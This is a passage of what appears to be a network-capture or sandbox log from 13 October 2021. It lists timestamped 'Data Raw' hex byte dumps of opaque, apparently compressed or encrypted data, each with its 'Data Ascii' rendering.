ec 67 ab b3 cb a8 8c 6b 0c 19 62 9c
                                Data Ascii: 7BnwN}MZ, y=:1r+a|::An}ROF57OtRcY#[0x>.3TB^,98lacM4[Cw.V_H<rQC1]?ddQYQ%.*B?3t?vGR>?R%-a2d(1gkb
                                2021-10-13 14:54:49 UTC162INData Raw: ae f0 91 fa 34 20 d7 ce fb 36 db 50 5d fb 69 fc de 01 be 6a 8e af ca 01 50 2f 08 8a 94 a3 aa ee 3a 23 ba 0a a5 8c 4d f3 53 b6 9c 80 47 0e ec b5 74 a6 59 7a ac 2e 91 1c c7 6b a5 44 a7 41 4b ce ce d0 cc 05 d3 91 d2 e7 49 89 0b 47 ce 32 6f 9c 12 2f 95 7f aa 0e 34 8c 00 6d 8a 1b 79 65 f1 07 40 a1 0a 6e 6b 42 63 97 36 df 8b f9 aa dd cd 27 a2 7e e0 87 ba 34 1b 8c 8b 0b c7 0a 0c e5 19 8f 9e 06 2c 53 41 4c 68 a3 be 9b 46 db 4a 70 09 d8 6e 2a 7e 8d 9f e9 c1 65 18 30 41 dd e2 29 96 1f ad 98 14 76 3a 22 01 21
                                Data Ascii: 4 6P]ijP/:#MSGtYz.kDAKIG2o/4mye@nkBc6'~4,SALhFJpn*~e0A)v:"!
                                2021-10-13 14:54:49 UTC162INData Raw: 19 8b 21 90 40 9d c2 46 da 5b 35 a7 05 da 5b 4d a9 a3 8b a6 ca 37 ab d8 49 05 71 e8 06 31 cc d6 29 8a 57 d2 c6 15 08 08 06 e0 14 be 05 45 8a 44 28 d4 3b 56 35 c1 8e b5 56 e2 37 b4 45 03 f1 3d 47 6f 6b f2 51 29 e8 71 8e 3d 64 7b b7 f6 aa ba 0f ce 54 59 7f c5 ec fa 95 3e 93 8b 5e 00 cf b1 11 ea 36 92 fe 42 72 a6 69 8e 33 bf 80 46 95 03 a0 8e fb d1 b5 97 85 21 fb ef 42 8c c4 36 e9 f8 1a e2 c1 e2 9f d0 81 eb 5d 67 b0 62 dd 23 53 5d 5b bb 80 62 ff 78 c2 92 49 51 8c 74 d7 52 83 f3 3a b1 29 14 d6 e5 27 d0 c4 92 ff 2c 39 12 ab fe 32 a0 f3 21 ac a4 15 79 ad f9 cb 6a 78 9c fb 8d 5a 61 07 af 8c 9e 44 1e 6c 1e f8 07 61 e6 24 27 04 98 6d eb ba 66 c4 18 10 d2 b1 e2 7c 48 a8 11 45 c0 db b1 30 6a 9d 28 43 bc 62 70 41 47 a9 d6 ab df 74 b1 42 53 6f d2 da a2 0d a2 86 6b d5
                                Data Ascii: !@F[5[M7Iq1)WED(;V5V7E=GokQ)q=d{TY>^6Bri3F!B6]gb#S][bxIQtR:)',92!yjxZaDla$'mf|HE0j(CbpAGtBSok
                                2021-10-13 14:54:49 UTC163INData Raw: 51 5d 1c 61 3e 68 ef d0 c2 40 3e 4f 8d 48 75 0d 77 05 e6 47 81 d9 22 a8 82 8e b4 72 5a 34 d5 ab 1b 81 64 64 ae 2e ad a7 4a 72 67 1a 29 2f ed 86 b5 6f e3 7f 7f ff 87 e2 2c 91 c6 49 79 c1 af ec d8 73 97 2d bd 53 2f 59 83 2d 55 02 30 ad 57 5f 6f f8 73 08 bc 92 8b e7 2a 60 cd 4a d5 f9 f5 f8 dd 20 60 6b 98 ed f8 12 8c 06 08 00 10 30 89 44 c2 d8 cd f2 8c f0 17 a3 74 d0 c7 d2 c6 4c 54 a4 e9 7d c7 6e 1e 7a 13 ce d8 76 36 99 b1 cb 43 e1 04 ed f6 5b ec 86 aa bb ce 36 c1 7c 77 a1 c5 f9 c2 77 de c7 da fc 4d 0b 31 e5 c2 35 77 4f 18 0d ad 6e f9 3f 3a ab 26 78 93 11 45 1f cb 3a 44 10 3b de 50 52 59 54 09 73 9b da 86 f5 c7 11 b4 43 d1 a5 ea 25 33 b9 b5 d6 fe b3 30 67 ff d4 55 5d b7 b4 8d e7 b9 18 78 54 8e cf b5 37 d7 04 bb 8c b5 56 57 2a 10 58 e4 e9 98 22 36 58 56 e6 7b
                                Data Ascii: Q]a>h@>OHuwG"rZ4dd.Jrg)/o,Iys-S/Y-U0W_os*`J `k0DtLT}nzv6C[6|wwM15wOn?:&xE:D;PRYTsC%30gU]xT7VW*X"6XV{
                                2021-10-13 14:54:49 UTC164INData Raw: 17 55 87 aa d7 a7 32 e3 78 36 a0 e4 7c bf 95 7c 0d a0 a6 d7 3a b8 89 86 09 78 e3 c3 e1 4f 02 ca c4 95 cb c4 1d 19 56 f1 5b 23 42 d7 51 e6 96 23 cb 84 59 95 3d a1 1a 61 01 00 74 8a b6 58 40 75 02 bb 57 38 cc 8b 3a 96 87 1e b1 1f a9 79 7c fb 13 f1 48 25 23 cd a1 6b f4 84 59 1a ca c7 27 ea f2 ce f5 d8 70 96 5d 29 c1 f6 4b 12 1a 41 22 5c 0d 92 78 63 31 07 9f 9c a2 a2 26 ca 87 b8 22 fc 56 0c aa a4 8a 1d 99 c8 3d 52 01 1b ab b0 71 5c 24 bc 8b 6d 41 65 ee 51 bd 1c 0d d0 fa 46 af db e2 d0 a0 44 af 2c d9 7c 6e e1 aa ff 61 fa 57 19 da 34 a8 10 ce 11 37 5c 52 a8 a7 eb 31 73 84 ee 64 0b 2b 39 2f 07 37 c4 d1 5f 14 fe 8d 35 aa ed b5 d0 cb ed e6 58 21 00 71 93 5e 2d b2 9a 2b a3 18 26 94 b1 53 cc 4d 3a a4 8f 39 01 45 78 a3 38 b8 d6 1b 47 31 9c d9 ad 10 7d 95 f9 1f f8 83
                                Data Ascii: U2x6||:xOV[#BQ#Y=atX@uW8:y|H%#kY'p])KA"\xc1&"V=Rq\$mAeQFD,|naW47\R1sd+9/7_5X!q^-+&SM:9Ex8G1}
                                2021-10-13 14:54:49 UTC166INData Raw: 8e b4 e1 eb 60 d2 7a 33 79 67 9d 30 a6 1f 5f fe 23 a7 ba bf 5f 63 40 3b 90 0f 74 c1 aa f3 6d e2 b5 56 1a 84 0d e4 6e 1e a0 93 99 22 4a 82 24 8b d2 12 d9 ef 49 a3 c4 29 45 35 1c f1 59 0e 2d 80 ac 5d 9b e5 d2 c9 46 f4 87 14 c8 2f d6 dc c2 74 4d 1f 06 fc d6 90 e1 8f b0 f2 31 24 63 92 cd 66 cd 1d f6 19 b5 32 44 97 0b 60 ef 38 9d 04 f6 cb 04 9e d2 8e dc c9 98 b5 72 0c 41 c2 bc 24 e8 d2 5b 9e 8f 3f 05 c0 8e bd ba e7 03 d2 0c 94 17 f9 c3 bb 3c 70 dc b7 9f a3 70 93 aa 17 d2 57 75 9f 0e d6 bf 05 b6 3a 17 80 65 55 d1 89 80 a9 ac ce 62 d2 ce 54 0e 5f 10 d2 8b 7a f9 80 fe 86 70 2e 7c 2a 8c 17 d3 d2 2f 22 ba 77 00 3a 92 14 05 2c bc 47 a7 d8 b2 73 81 ce 09 d7 79 70 d0 e7 62 0e 19 77 0f 13 50 2c b7 56 57 8c fd 95 f9 04 6e 50 27 62 d7 e0 31 59 b1 30 71 3d bc b4 c0 fa a4
                                Data Ascii: `z3yg0_#_c@;tmVn"J$I)E5Y-]F/tM1$cf2D`8rA$[?<ppWu:eUbT_zp.|*/"w:,GsypbwP,VWnP'b1Y0q=
                                2021-10-13 14:54:49 UTC167INData Raw: aa 71 fd 34 3a ff 71 2b a9 9e b7 b6 52 2b 96 c5 51 9c 09 62 b0 ae 5e 59 ca 37 bb db 97 b3 63 4f 62 ce 72 6e 95 77 70 e8 71 d7 dd 7b f0 2c 9a de 2f de 16 f7 c7 4c 78 4c 32 f0 50 32 80 f5 26 1e fb 56 eb eb 25 d1 34 09 42 1c ec fd 17 15 16 03 9d 0a 65 9b f7 40 55 aa 0b e3 e0 ba 8b e6 d3 bd fe c7 b3 cc b9 8d 6b aa 9f f2 43 0e 01 3a ed 07 a9 be 48 f2 37 d6 f2 5d 5e 27 58 56 d0 b5 c1 b8 8c 47 4c b3 6e fe e2 05 92 cc da e1 ea 2d 71 37 de 71 fb 23 05 ac 48 7c 65 a3 53 94 3d f3 7d 5f d6 35 f5 f0 02 d4 b0 42 ef 7f 83 1e 0d c7 2c 45 89 18 3f ec 71 87 20 33 99 67 7f aa 19 63 4e 21 3a 7d 82 27 47 9b 55 6b a5 14 ea f3 dd b5 c7 d3 13 e0 44 c4 83 cf 37 59 be a5 2a f8 2a 58 60 ec 44 58 c4 df b3 9e 85 a1 42 8b 58 9d 08 87 be 83 0e 8b f0 ae 56 c8 28 00 a3 c6 e9 6f 22 04 c8
                                Data Ascii: q4:q+R+Qb^Y7cObrnwpq{,/LxL2P2&V%4Be@UkC:H7]^'XVGLn-q7q#H|eS=}_5B,E?q 3gcN!:}'GUkD7Y**X`DXBXV(o"
                                2021-10-13 14:54:49 UTC168INData Raw: 00 63 91 1b dc 84 7d d7 37 b3 e1 6e 12 d2 12 80 b7 9b 61 0d 77 a6 44 bb ba 9f a6 7b 7b f0 ca f1 52 02 1d c4 02 4a 66 0b 39 24 8b 53 2a 52 d7 51 31 96 bd 4a 86 4f b5 4f 8c 1d 68 11 1d c0 03 b6 c7 41 77 13 bb a0 9b 68 83 2b 8b 1b 9e b1 ad a8 7c 6d fb d1 48 b9 27 32 d0 e9 e8 f4 30 58 1f db c7 3a 06 17 cc e4 c5 88 18 5d 90 c0 f4 5b 12 df fa bd 5c 1c 93 ee ef 31 bc 9e 9e b2 a2 77 d0 ea b1 33 fd 48 9d aa 1f 8b 1f 89 c8 3f ad 72 12 ba b1 a3 c9 24 07 8a 6f 51 65 9c 13 3f 15 1c d1 84 d7 af 60 e3 d2 b1 44 dd 96 9f 7f 7f fc b2 99 60 41 56 1b cd 34 da 63 22 18 26 5d 24 cf a6 37 30 71 92 ee 16 fd 7b 33 3d 1a 5f a9 d0 83 15 fc 9b 35 d8 9b 19 da df f0 96 0b 20 de 70 96 48 2d c0 7e e2 a9 0d 3b d4 ee 52 2b 4c 3f b2 9f 14 a7 51 73 b4 25 9c 88 1a aa 30 9e cf ad e7 67 6b f1
                                Data Ascii: c}7nawD{{RJf9$S*RQ1JOOhAwh+|mH'20X:][\1w3H?r$oQe?`D`AV4c"&]$70q{3=_5 pH-~;R+L?Qs%0gk
                                2021-10-13 14:54:49 UTC169INData Raw: fe b1 c3 8e c3 c2 fb 61 d3 7c a9 7a 52 6e 33 83 c2 52 ee 21 a6 b9 6b 10 70 05 31 3e 2e 7c cc a8 f2 6d 8e be 5b 5e 86 30 d2 4b 02 87 92 99 93 5f 8f 25 8a 94 09 8b e9 f0 ad e1 af 4a 26 1e f0 5a 96 0a d3 a0 79 6a ed eb d9 44 f5 87 5a c5 39 8e d9 83 02 e5 03 21 aa 56 e2 e0 cf ad a4 f7 d0 58 d9 c2 3f 68 82 f7 59 ab 64 c7 ba 4a 23 bd 35 20 76 d5 d8 06 c8 52 fc de 8d 80 fb fc de b6 84 87 22 ee af 5d 8d 8e 69 c3 b1 c8 fe 66 be a6 25 0a dc 09 af 40 24 7b 3b ff ea d0 81 52 db b4 41 52 86 77 d7 56 d3 f5 73 cc 26 30 d6 8a bd d0 c4 9e ff 3d 21 70 ba 56 02 ab c0 a5 bd 95 2c 79 ad ff d3 60 5d ef fb a8 5a 41 1e af 8c bd 3a 0d 6c 60 7d e1 6e 87 11 77 9f bb 3e 9f c8 1e aa 88 65 54 b1 c7 7c e0 8f 11 45 d0 db a0 30 d6 db 9b 05 dd 62 3c de 27 10 d6 ab 22 58 9c 45 f6 2d 9b b5
                                Data Ascii: a|zRn3R!kp1>.|m[^0K_%J&ZyjDZ9!VX?hYdJ#5 vR"]if%@${;RARwVs&0=!pV,y`]ZA:l`}nw>eT|E0b<'"XE-
                                2021-10-13 14:54:49 UTC171INData Raw: 50 ff c8 bf 64 d1 62 a9 36 01 3f 3f c0 1d e8 aa 2a bb 93 d1 6f 18 77 ee f9 42 9f f5 22 a3 98 16 ae 60 5a 5d c8 59 14 d3 7e 58 be 9d b0 dd 48 dc 7a 09 29 c4 e8 ca b0 6d d3 35 68 1f a6 d0 1f 94 c6 95 4a a0 85 c0 d8 51 9f b5 a7 45 2f d3 ab ba 7a 83 2a 9b 5c 35 5e ff 73 79 ac 18 91 f7 3e 4d e2 f9 cf af ef b0 ca b9 7a 7e 98 54 f6 8e 8b 2a 08 7f 1b a8 93 4f c0 26 d0 93 bd af 04 70 50 48 db c1 c6 93 41 5f c1 31 d3 3b 01 b8 3b 84 c5 e9 2b 71 99 ca 43 8b 24 75 d6 63 ec 6c bb 52 e6 3c c1 6c 59 c1 c4 03 d3 2a d2 e4 fe ef 4d 81 18 1e ea 06 70 3d 1a 15 9e fc dc 3e 35 99 15 6d 93 e8 67 5e dd 16 44 f8 07 46 4a 54 59 b4 12 98 80 69 9d c1 d5 e3 b4 44 d1 af c9 34 2b a8 87 ce fc 00 2a 39 d8 47 5e c4 ad a1 8d 56 a6 99 67 74 8e d2 a6 bf f1 0f b9 e1 a8 17 51 d9 02 8b c0 f9 b2
                                Data Ascii: Pdb6??*owB"`Z]Y~XHz)m5hJQE/z*\5^sy>Mz~T*O&pPHA_1;;+qC$uclR<lY*Mp=>5mg^DFJTYiD4+*9G^VgtQ
                                2021-10-13 14:54:49 UTC172INData Raw: 2f d4 59 01 88 9f 1f f7 a9 83 d6 79 33 a9 3c 33 a0 13 7a b9 9d 3c 05 52 a2 0b 3b c6 cd 87 09 7a f4 c5 e9 3b 0a e3 c5 4d ca ee 59 18 56 8a 58 25 4a fa 65 1f 97 ed ca 3a 1d 94 3d 8d 0d 67 09 27 40 c5 b5 97 41 bf 46 ba 57 9d cf 8d 32 2b 92 e4 b5 fc a8 80 38 fa 13 5d 5f 23 2b 7e b4 76 f5 61 58 17 8f c6 27 05 f1 c8 fd 3e 6d 5d 59 c2 c0 c8 0f 13 1a ec 3b 5a 05 86 64 73 30 ee 9e d6 e6 a3 26 d3 83 be 2a 89 5b d0 ab 4c 8b 63 dd c9 3d ba 1b 1d a3 32 7c 32 27 54 8a e7 05 64 ee 12 b9 1a 05 5b d9 0d ab 34 e3 6e e5 45 af 97 c6 7a 66 69 8b 49 64 15 56 d3 9e 35 a8 62 cf 17 3f a6 4b f7 a7 62 30 8d c1 ef 64 fc 2d 3f 27 1d 2b 1d d0 d6 15 f4 cb 34 aa 9a b1 d6 c3 ca e8 56 3e 88 70 aa 18 2c b2 7f 0b a5 10 70 9a b6 4c 7d 4c 77 e2 9e 39 a0 41 69 bb 31 9d 79 1a fd 30 2a fb ad 10
                                Data Ascii: /Yy3<3z<R;z;MYVX%Je:=g'@AFW2+8]_#+~vaX'>m]Y;Zds0&*[Lc=2|2'Td[4nEzfiIdV5b?Kb0d-?'+4V>p,pL}Lw9Ai1y0*
                                2021-10-13 14:54:49 UTC173INData Raw: d4 48 7f ff 94 34 88 d0 c2 8a 62 83 f1 b0 74 77 9f 20 a6 b0 53 98 02 d7 ba cf dd 72 42 3a 90 37 59 be a9 64 4e ff bd ef 3a 85 0d d9 5a 0b ba 9c bc 80 5f fe 26 06 5e 0b c7 e2 4b c4 c7 dd 4b a6 3f 81 59 72 80 ca ae 5c 9b e9 d6 d7 61 e6 87 2b c6 26 45 db c4 09 4b 6a 07 fb 46 f1 e0 be ae 8a 3c d2 65 d2 d3 74 4e f0 f6 a7 aa 15 c4 86 81 21 f1 3e 9b 68 e8 cc 23 4e 52 8d dd 3d 0b e2 f2 fb 47 90 a2 50 ef 84 79 fc 8d 6d 0b b3 8f f5 a4 a7 83 57 0b ed 2d de 43 94 b3 39 c2 e1 1f 98 77 a9 b5 02 76 f4 74 bb 9f d1 b9 78 b0 3f 15 a4 e4 79 f4 b0 9e e3 bc 38 64 9f d0 14 8e b2 10 ee b1 58 79 d9 69 ca 6e 78 fc fd 8d 28 cc 03 8b f9 bd 82 8e 6d 12 7c 07 67 a2 63 26 9e 9f 48 9f 3c 9f ab 7f 63 d2 b0 e2 8b 1e 8b 35 32 d0 13 20 31 49 da 7d 0c f8 95 76 86 03 68 d6 1b a1 59 b1 42 70
                                Data Ascii: H4btw SrB:7YdN:Z_&^KK?Yr\a+&EKjF<etN!>h#NR=GPymW-C9wvtx?y8dXyinx(m|gc&H<c52 1I}vhYBp
                                2021-10-13 14:54:49 UTC175INData Raw: e5 95 0a a7 65 84 b5 19 d1 06 5a 37 73 3e 85 d9 37 9a 47 95 90 ee d1 27 ea 76 9c f8 de 8a df 50 96 46 3d d3 60 aa af c9 74 13 93 72 72 49 f7 b5 d7 35 dc 06 f1 28 29 ed 3a b7 47 4c 78 f4 0e db d0 23 6b c7 0a 48 7b 91 ea aa 08 f9 9f da 45 97 30 aa 97 7d 14 26 b1 ab e3 39 d5 0e 79 18 29 91 e1 2a 96 e6 cb c1 da e6 b1 b7 b9 4e 9e 99 9d f4 43 87 00 7a ee d9 82 ee 4f 78 c1 d1 f2 8c 5f 03 5a 22 d1 37 eb bb 93 59 ba c0 6f c7 e0 15 92 cc da d2 c4 56 71 f5 2e 42 f9 25 05 d8 51 e2 5d 86 70 9b 3c 45 88 58 d6 c2 f3 c4 18 dc 95 8c c2 30 81 64 f5 eb 2b 77 8b 78 3c cf 60 ea 3f 48 99 de 87 92 1b 65 4e d0 24 4a a5 e1 47 37 54 ed 85 12 ea 81 dc 80 f3 db 36 81 45 ac af 39 de 2a bf b5 28 fd 22 0e 6c b6 47 23 c4 89 48 8c 87 a7 42 7f 56 bf 07 41 be 8c 0f 89 08 a9 56 57 29 10 a9
                                Data Ascii: eZ7s>7G'vPF=`trrI5():GLx#kH{E0}&9y)*NCzOx_Z"7YoVq.B%Q]p<EX0d+wx<`?HeN$JG7T6E9*("lG#HBVAVW)
                                2021-10-13 14:54:49 UTC176INData Raw: 0d a8 85 8d d7 24 01 9a 9a 15 dc 84 7d 41 37 ea f4 9e 30 dd 13 54 bc 97 61 0d 77 30 44 05 b9 6f 84 74 7a bd c0 e3 52 02 1d 52 02 16 70 fb 1b 2b 8a 3c 20 40 d7 51 31 00 bd a2 85 bf 97 40 8d 8d 62 03 1d 74 5d 20 c7 58 60 e4 b9 2a 9d 54 88 38 8b 87 c1 27 ad 3a 7f 9a f9 6e 5d e8 26 21 d0 a1 88 62 30 1b 08 2c c5 5a 05 22 cd f7 c5 70 78 cb 90 1c f7 ac 10 67 ec d5 5f 0f 93 7a 8d a7 bc 14 86 45 a0 5b d3 89 bc 20 fd 54 fe 3c 1f 8d 1b 7e ca 40 ba 3d 1f a9 b1 73 aa b2 07 dc 75 a6 67 93 12 fb 18 0f d1 f8 bc 39 60 d3 d6 46 46 d2 97 9b 78 6c fc aa f5 f6 41 43 00 3d 36 d5 62 b6 15 35 5d 50 be 30 37 54 75 62 ec 19 fc b8 3d 2d 1a 37 dd 46 83 f6 e3 6b 37 d7 9a 00 d4 c9 f0 e6 7e b6 de fe 92 b8 2f cf 7f c7 a7 1a 3b 94 98 c4 2b 4c 1e 42 9d 44 a0 a6 7c a1 25 b8 ff 8c aa 88 9a
                                Data Ascii: $}A70Taw0DotzRRp+< @Q1@bt] X`*T8':n]&!b0,Z"pxg_zE[ T<~@=sug9`FFxlAC=6b5]P07Tub=-7Fk7~/;+LBD|%
                                2021-10-13 14:54:49 UTC177INData Raw: 31 2c 73 a9 48 a5 f3 96 c3 8e c3 54 fb dc d2 9c b3 09 77 63 3c a4 c2 52 ee b7 a6 fd 6c b0 71 3f 3a 8d 2f 5b cc a8 f2 fb 8e e8 59 fe 87 70 d9 64 03 a0 92 99 93 c9 8f 2f 82 34 08 ba e2 2b ac c6 af 4a 26 88 f0 d5 94 ea c9 d3 5c 19 e1 cc d9 44 f5 11 5a 30 30 2e d8 b9 09 ef 02 06 aa 56 e2 76 cf 17 a6 57 d1 18 d2 15 3e 4f 82 f7 59 3d 64 8a ae ea 22 8c 3e 73 77 f2 d8 06 c8 c4 fc 3e 8f 60 e1 8f fb 4d 89 a0 22 ee af cb 8d f5 7d 63 b0 f2 f5 8f be 81 25 0a dc 9f af 4e 27 db 3a bf e1 53 81 75 db b4 41 c4 86 a8 c2 f6 d2 c4 78 dd 26 17 d6 e5 27 46 c4 df fc ca 3b 19 9f 5e 0d 8c c0 11 9f 03 2c a6 bb 1f c9 13 78 4c f4 8f 5a cd 84 39 8c d6 39 f8 6e 6f 7c d6 6e a0 11 27 04 2d 3e 83 df e9 a8 02 63 21 be e0 7c 18 11 87 45 45 d8 57 32 34 da 68 1a fa 62 70 41 b1 10 90 bc d5 5a
                                Data Ascii: 1,sHTwc<Rlq?:/[Ypd/4+J&\DZ00.VvW>OY=d">sw>`M"}c%N':SuAx&'F;^,xLZ99no|n'->c!|EEW24hbpAZ
                                2021-10-13 14:54:49 UTC178INData Raw: b6 84 1f e9 99 08 50 63 da 28 64 d1 53 5c 34 0e 3e ab d2 35 e8 46 3e 2c 93 23 6a ed 75 e1 f8 91 81 dd 22 97 8d 81 ae 06 6b a8 ca 09 13 e3 7e 70 be f1 a5 4a 48 c0 7c fc 2b 54 ed ab bb 45 d3 79 7f 88 a6 cc 2d 61 c4 77 48 c8 9d e8 d8 09 87 22 a7 03 29 26 a9 ea 7d c1 2a b3 5c e5 47 68 73 af 98 ed 93 9c 2a 61 fa d1 cf ff f5 27 ca 85 7b 8b 9a e0 f4 5b 8a 02 08 ef 01 3f 93 ef c6 d3 d2 8f 8c 66 0e 58 50 d0 c7 56 c6 1c 40 aa c3 12 c7 ba 18 90 3b dc d8 7e 2b 65 9e 3f 41 84 25 7e c5 4b ec 78 a5 c5 e6 fd c0 99 5b ab c2 6e d9 02 d2 b0 dd 78 4d cb 1f eb e8 56 77 34 05 3d 9e 70 f9 a9 35 c1 17 98 91 66 65 ae cd 3e 44 80 21 d1 4a 58 51 41 10 97 81 de 9a e9 d5 13 92 d3 d1 20 cb c1 29 c2 b5 0c e2 28 2a 61 ff d0 5e d9 a7 54 8f fa a7 04 60 5c 8e 0a 81 28 f1 b3 bb 14 aa 2b 57
                                Data Ascii: Pc(dS\4>5F>,#ju"k~pJH|+TEy-awH")&}*\Ghs*a'{[?fXPV@;~+e?A%~Kx[nxMVw4=p5fe>D!JXQA )(*a^T`\(+W
                                2021-10-13 14:54:49 UTC180INData Raw: be ff e6 0f a2 86 6b 43 59 d2 8c 7f 15 a1 84 11 f1 35 33 e1 78 a4 a0 5d 5b 59 97 1c 0d f9 80 46 3b ba 89 10 09 87 f0 25 e3 2f 02 b2 e2 00 ca 66 1d 8f 56 e4 7d c5 40 aa 51 e0 b0 bf ca 86 59 03 3d a3 08 87 03 60 74 af 90 c5 41 77 02 2d 57 34 e4 6d 38 f6 87 d5 96 af a8 7c 7c 6d 13 05 5a c3 21 ad a1 be d3 32 58 1f ca 51 27 aa c1 28 f7 b8 70 20 7a 92 c0 f4 4a 84 1a 6e 3e ba 0f ee 7a f7 16 be 9e 9e a3 34 26 0a b3 5e 20 80 54 62 8d 1d 8b 1f 98 5e 3d 00 1e fd a9 cc 73 14 03 05 8a 6f 40 f3 ee 11 88 fa 0f ac f8 5c 88 62 e3 d2 a0 d2 af 62 c3 9a 6c 81 aa f7 48 43 56 1b db a2 a8 0b fe f7 35 20 50 9d 8e 35 30 71 84 78 64 e3 2b df 2d 67 37 99 f8 81 15 fc 8d a3 aa 85 83 36 c9 8d e6 1b 08 dc 70 96 5e bb b2 36 0d 45 1a 46 94 1e 7a 29 4c 3f a4 09 39 79 75 9e a1 58 b8 58 32
                                Data Ascii: kCY53x][YF;%/fV}@QY=`tAw-W4m8||mZ!2XQ'(p zJn>z4&^ Tb^=so@\bblHCV5 P50qxd+-g76p^6EFz)L?9yuXX2
                                2021-10-13 14:54:49 UTC181INData Raw: db 9a 24 36 ca e7 d4 ff 68 18 96 be 8e 62 f0 f9 62 d3 7a 27 74 8d 9c d7 a4 bf 52 2c 13 a4 ba 6b 56 e5 42 82 89 c7 5b b1 a8 11 5f 8c bd 5b 18 13 0d fd 5e eb a0 ef 99 97 6c 8d 26 8a d2 9c c7 11 51 44 c6 d2 4a 03 2d f2 59 96 0c 5d ae 12 9f 09 cc a4 44 b2 b4 58 c6 39 c8 4c c4 cf 54 ea 06 d7 56 8a d3 cd ae a4 b1 45 65 50 d7 d6 4f ff f7 d0 98 66 c4 ba 0c b6 f1 ce bb 9f f2 a5 06 63 61 fe dd 8d 86 75 f2 57 43 60 a0 5f ee 62 6e 8f 8d 69 85 24 8f d2 85 57 81 58 0a 32 3a ad 43 24 3d ae c2 37 1b 68 75 a6 b4 4e 66 84 74 d7 10 46 b9 29 91 cf 17 ab e5 16 e4 c6 9e ff 2c af 64 98 d5 e4 8c bd 11 cc a1 2e 79 ad f9 5d 6e 09 d9 1d 8f 27 cd f0 9b 8e bd 3a 1e fa 12 4d 02 87 a0 6c 27 92 8f 3c 9f c8 0f 3c 7f cf f9 57 e0 01 18 a6 25 47 d0 db b1 a6 49 81 78 ec fa 1f 70 99 13 12 d6
                                Data Ascii: $6hbbz'tR,kVB[_[^l&QDJ-Y]DX9LTVEePOfcauWC`_bni$WX2:C$=7huNftF),d.y]n':Ml'<<W%GIxp
                                2021-10-13 14:54:49 UTC182INData Raw: ad 10 61 22 f9 c8 e7 65 08 2d 63 17 80 66 d1 62 ba a0 73 52 91 2e 35 95 46 d0 84 91 d1 6f 0b e1 9c f9 dd 7d dd 5f 97 9d 28 ac 60 5a 4e 5e 74 c3 86 82 70 c3 f1 97 e3 4a dc 7a 1a bf 29 c6 39 47 45 ae 79 2b 21 a4 d0 1f 87 50 0a 9b 6d 61 e8 a5 09 f2 8b a5 45 2f c0 3d 97 22 17 d6 b3 21 e5 d1 c1 71 79 ac 0b 07 e1 3a 81 06 d1 b2 ff 42 8e c8 b9 7a 6d 0e 9d 7d 40 77 02 75 ef d8 96 91 4f c0 35 46 f2 b6 48 f3 58 2d d0 3d ff c4 93 41 4c 57 6f 74 e3 e5 90 46 dc c4 a8 29 71 99 d9 d5 f9 9f 12 38 4b 91 78 9b 13 e4 3c c1 7f cf d6 3f f0 24 02 af b0 82 ae 4f 81 18 0d 7c 2b cc 92 f8 3d e3 70 78 7f 37 99 15 7e 05 1b 42 4a 30 3e 39 80 82 07 48 54 59 a7 84 ea 77 c6 60 e9 a8 13 56 05 d3 af c9 27 bd bf e4 2c 18 28 57 61 1a 06 5c c4 ad b2 1b 87 6e 5d 9a 5c f3 0a 86 ff f3 0f b9 f2
                                Data Ascii: a"e-cfbsR.5Fo}_(`ZN^tpJz)9GEy+!PmaE/="!qy:Bzm}@wuO5FHX-=ALWotF)q8Kx<?$O|+=px7~BJ0>9HTYw`V',(Wa\n]\
                                2021-10-13 14:54:49 UTC183INData Raw: 42 e6 2d 2a b3 26 0f df 86 68 9e 5b 01 88 99 81 dc 07 7c 31 35 4e e1 5d 79 a2 13 7a bf 03 61 05 70 40 46 46 ba cf cd 0b 7a f4 c3 77 52 b7 1c 22 00 b7 66 75 52 54 8a 58 23 d4 d7 6f 36 70 bf b7 86 d3 de 3f 8d 0d 61 97 1d 73 5f 50 c5 3c 77 ae f0 55 9d cf 8b ac 8b 38 c6 57 af d5 7c b2 b0 11 5d 5f 25 b5 d0 22 8a 12 32 25 1f 3a 8c 25 05 f1 ce 63 c5 9d 71 bb 92 bd f4 58 5e 18 ec 3b 5c 9b 93 ca 8f d7 be e3 9e 97 ee 24 d3 83 b8 b4 fd 73 ea 4c 1d f6 1f ce 84 3f ba 1b 1b 3d b1 a9 a8 c2 05 f7 6f 37 29 ec 12 b9 1c 9b d1 97 a8 49 62 9e d2 38 08 ad 97 c6 7c f8 fc ae f6 86 43 2b 1b 61 78 aa 62 cf 11 a1 5d 83 ab 40 35 4d 71 58 a2 66 fc 2d 39 b9 1a 19 de 36 81 68 fc 73 79 a8 9a b1 d0 5d f0 30 68 c6 dc 0d 96 7e 60 b0 7f 0b a3 8e 3b f6 9b b4 29 31 3f e6 d2 3b a0 41 78 35 25
                                Data Ascii: B-*&h[|15N]yzap@FFzwR"fuRTX#o6p?as_P<wU8W|]_%"2%:%cqX^;\$sL?=o7)Ib8|C+axb]@5MqXf-96hsy]0h~`;)1?;Ax5%
                                2021-10-13 14:54:49 UTC185INData Raw: 13 10 c5 0f 9a 59 36 fa 26 d6 48 7f fe 02 c3 74 f3 24 f9 1f d3 28 e6 76 77 9f 31 30 c2 89 eb c7 a4 c7 6b 25 24 40 3a 90 21 cf cc 8c c3 8b 8c c0 5b 8d d2 0f d9 5a 0d 34 92 8f 95 b9 8d 5b 8a 65 5d c5 e2 4b a2 52 af 45 14 f8 f2 24 96 d4 9c ac 5c 9b ef 58 d9 04 f3 61 58 bb 39 31 8d c6 09 4b 0c 92 aa 79 d1 06 cd d3 a4 ab 8b 67 d2 d3 30 db 82 9d 5f 4d 66 b9 ba 30 78 f3 3e 9b 79 66 d8 fc fc b4 fe a0 8d d8 bb f0 fb 47 86 34 22 dd ae bb 8f f0 69 05 ea 8d f5 a4 b1 15 25 9d da ef ad 3e 24 9f 60 c0 e1 1f 8e e1 db 32 40 b4 84 09 d7 d4 88 bb 78 b0 29 83 d6 ee 20 36 c6 e3 ff ca 61 66 9f d0 02 18 c0 a9 9e 73 2e 04 ad f1 92 6c 78 fc fb 1b 5a 8c 83 49 8e c0 3a 34 35 10 7c 07 61 34 11 2d 06 5d 3c e2 c8 43 f3 7d 63 d2 b1 74 7c da 16 f7 47 ad db df 69 4b da 7d 0a 6e 62 f6 43
                                Data Ascii: Y6&Ht$(vw10k%$@:![Z4[e]KRE$\XaX91Kyg0_Mf0x>yfG4"i%>$`2@x) 6afs.lxZI:45|a4-]<C}ct|GiK}nbC
